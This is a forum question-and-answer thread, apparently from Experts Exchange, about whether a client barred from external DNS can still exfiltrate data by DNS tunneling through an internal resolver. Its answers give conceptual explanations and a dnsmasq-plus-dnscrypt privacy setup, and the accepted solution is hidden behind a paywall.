Link to home
Start Free TrialLog in
Avatar of trojan81
trojan81

asked on

Dns tunneling

Experts,

This question is in regards to DNS tunneling. The abuse of DNS protocol to exfiltrate data.

Assume Windows client 10.1.1.1 is able to reach his internal DNS server 10.2.2.2 over DNS.  Only the DNS server is permitted to talk to the internet over DNS.  The client will be blocked from talking DNS out to the internet.

In my example above would the client be able to still be able to do DNS tunneling by relaying it through DNS server 10.2.2.2?
Avatar of Mahesh
Mahesh
Flag of India image

No
Client will have either http/https or any other specific port such as 5061 etc access towards internet and not dns traffic (tcp / udp 53)
Client will end in terms of dns up to local dns server
Avatar of Dr. Klahn
Dr. Klahn

I don't see why not.  The payload for a DNS tunneling exploit is in the FQDN being resolved.

10.1.1.1 requests a DNS lookup for thisismysecretdata24681357.nowhere.com.  Assuming that 10.2.2.2 does not have this FQDN cached, the local DNS server will pass the request out through the firewall to the internet for resolution.  There it will be just another UDP packet that can be sniffed or intercepted.  Once that packet is on the internet anybody can capture it if they have physical access to the cable or software access to any of the intervening nodes.
I think you're mixing up what DNS tunneling + normal DNS forward mean.

What you've described is a simple, plain vanilla, DNS setup. No tunneling.

Your 10.2.2.2 server will have forwarders set like 1.1.1.1 + 8.8.8.8 + 8.8.4.4 + likely you'll run this on some random port, like 10053.

Then your clients, like 10.1.1.1, will connect to 10.2.2.2:10053 + your internal firewall will only allow 10.2.2.2 to talk UDP/TCP:53 + all other machine requests for UDP/TCP:53 will be blocked.
Avatar of trojan81

ASKER

I understand the difference. I am just describing a customer setup and asking if DNS data ex-filtration can occur in that scenario.
You can never block 100% of data discovery, 100% of the time.

And, to answer your question relates to what data you're trying to keep hidden.

This is a complex question.

Likely best to hire someone to audit your DNS + setup a system which meets your requirements.

That said, here's a nifty trick which does a very good job of hiding most DNS data at a level which is very difficult for anyone to scrape.

1) On all your clients run dnsmasq, listening on 127.0.0.1:53 which will provide fast + cached lookups.

2) Run dnscrypt listed in your dnsmasq config file as they only forwarder.

Then dnscrypt will convert all UDP + TCP port 53 requests to secure TCP over some other port (not port 53).

4) Block UDP + TCP port 53 communication across your entire enterprise.

Many of my clients use this setup.

I use this setup even at home, as it completely occludes all DNS traffic.

For anyone to scrape this traffic, they'd have to know all outgoing IPs the dnscrypt service uses... scrape all data from all IPs + then try to guess which DNS lookups your enterprise was making. They'd have to do this by injecting some sort of Malware inside your network to access some random, hashed, 100% unique IP... to have enough data to process dnscrypt scraping.

Likely dnsmasq + dnscrypt is what you're looking for as a cheap + fast way to occlude all your DNS traffic.
ASKER CERTIFIED SOLUTION
Avatar of DrDave242
DrDave242
Flag of United States of America image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial